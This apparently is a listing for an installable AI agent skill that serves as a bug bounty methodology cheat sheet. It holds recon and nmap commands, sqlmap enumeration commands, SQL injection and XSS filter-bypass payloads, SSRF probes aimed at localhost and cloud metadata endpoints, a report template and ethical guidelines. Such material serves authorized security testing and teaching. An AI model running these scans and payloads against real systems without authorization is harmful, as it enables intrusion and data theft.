bug-bounty-program

Installs: 62
Rank: #12054

Install

npx skills add https://github.com/dengineproblem/agents-monorepo --skill bug-bounty-program

# Bug Bounty Program Specialist

An expert in vulnerability research and bug bounty hunting.

## Testing Methodology

### OWASP Top 10 Focus

1. Injection (SQL, NoSQL, LDAP, OS commands)
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfiguration
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using Components with Known Vulnerabilities
10. Insufficient Logging & Monitoring

### Effort Distribution

- Reconnaissance: 30%
- Manual testing: 50%
- Automated scanning: 20%

## Reconnaissance

### Subdomain Enumeration

```bash
# Passive enumeration
amass enum -passive -d target.com -o subdomains.txt

# Active enumeration
subfinder -d target.com -all -o subfinder.txt

# DNS brute force
gobuster dns -d target.com -w wordlist.txt -o gobuster.txt

# Merge results
cat subdomains.txt subfinder.txt gobuster.txt | sort -u > all_subs.txt
```

### Technology Stack Identification

```bash
# Wappalyzer CLI
wappalyzer https://target.com

# WhatWeb
whatweb -a 3 https://target.com

# Nuclei technology detection
nuclei -u https://target.com -t technologies/
```

### Port Scanning

```bash
# Fast full-port scan
nmap -sS -sV -O -p- --min-rate 1000 target.com -oA nmap_full

# Service scan
nmap -sC -sV -p 80,443,8080,8443 target.com -oA nmap_services
```

## SQL Injection Testing

### Manual Detection

```sql
-- Error-based
' OR '1'='1
' AND '1'='2
' UNION SELECT NULL--

-- Time-based blind
'; WAITFOR DELAY '00:00:05'--
' OR SLEEP(5)--

-- Boolean-based blind
' AND 1=1--
' AND 1=2--
```

### SQLMap

```bash
# Basic injection test
sqlmap -u "https://target.com/page?id=1" --batch

# With authentication
sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" --batch

# POST data
sqlmap -u "https://target.com/login" --data="user=test&pass=test" --batch

# Database enumeration
sqlmap -u "https://target.com/page?id=1" --dbs --batch
sqlmap -u "https://target.com/page?id=1" -D dbname --tables --batch
```

## XSS Testing

### Payload Types

```javascript
// Reflected XSS
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

// DOM-based XSS
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>

// Bypass filters
<ScRiPt>alert('XSS')</ScRiPt>
<img src=x onerror="alert('XSS')">
<svg/onload=alert('XSS')>

// Stored XSS via different contexts
"><script>alert('XSS')</script>
'-alert('XSS')-'
</title><script>alert('XSS')</script>
```

### Context-Specific Payloads

```javascript
// In HTML attribute
" onfocus=alert('XSS') autofocus="
' onfocus=alert('XSS') autofocus='

// In JavaScript string
';alert('XSS');//
"-alert('XSS')-"

// In URL parameter
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>
```

## SSRF Testing

### Basic Payloads

```bash
# Localhost bypass
http://127.0.0.1
http://localhost
http://[::1]
http://0.0.0.0
http://127.1
http://0177.0.0.1

# Cloud metadata
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/
```

### Detection Methods

```bash
# Out-of-band detection using Burp Collaborator
url="http://your-collaborator-id.burpcollaborator.net"

# Webhook.site for testing
url="https://webhook.site/unique-id"
```

## Report Writing

### Structure

```markdown
# Vulnerability Report

## Summary
[One-line description]

## Severity
[Critical/High/Medium/Low] - CVSS Score: X.X

## Affected Component
[URL/Endpoint/Feature]

## Description
[Detailed technical explanation]

## Steps to Reproduce
1. [Step 1]
2. [Step 2]
3. [Step 3]

## Proof of Concept
[Screenshots, code, requests]

## Impact
[Business/technical impact]

## Remediation
[Specific recommendations]

## References
[CVE, OWASP, etc.]
```

### CVSS Calculator Factors

- Attack Vector (AV): Network/Adjacent/Local/Physical
- Attack Complexity (AC): Low/High
- Privileges Required (PR): None/Low/High
- User Interaction (UI): None/Required
- Scope (S): Unchanged/Changed
- Confidentiality Impact (C): None/Low/High
- Integrity Impact (I): None/Low/High
- Availability Impact (A): None/Low/High

## Tools Checklist

### Reconnaissance
- Amass / Subfinder
- Nmap
- Shodan
- Google Dorks

### Web Testing
- Burp Suite
- OWASP ZAP
- SQLMap
- Nuclei

### Automation
- ffuf (fuzzing)
- httpx (probing)
- waybackurls
- gau (URL gathering)

## Ethical Guidelines

- Stay in scope: test only authorized targets
- Don't be destructive: avoid DoS and data loss
- Protect data: do not distribute any data you find
- Report responsibly: follow the program's disclosure policy
- Document everything: keep detailed records
- Respect rate limits: do not overload systems

## Program Selection Strategy

### Criteria

- Response time history
- Bounty amounts
- Scope breadth
- Program maturity
- Community feedback

### Priority Matrix

| Program Type | Skill Level | Potential |
|---|---|---|
| New programs | Any | High |
| Broad scope | Intermediate | Medium |
| Narrow scope | Expert | Low-Medium |
| VDP only | Beginner | Low |
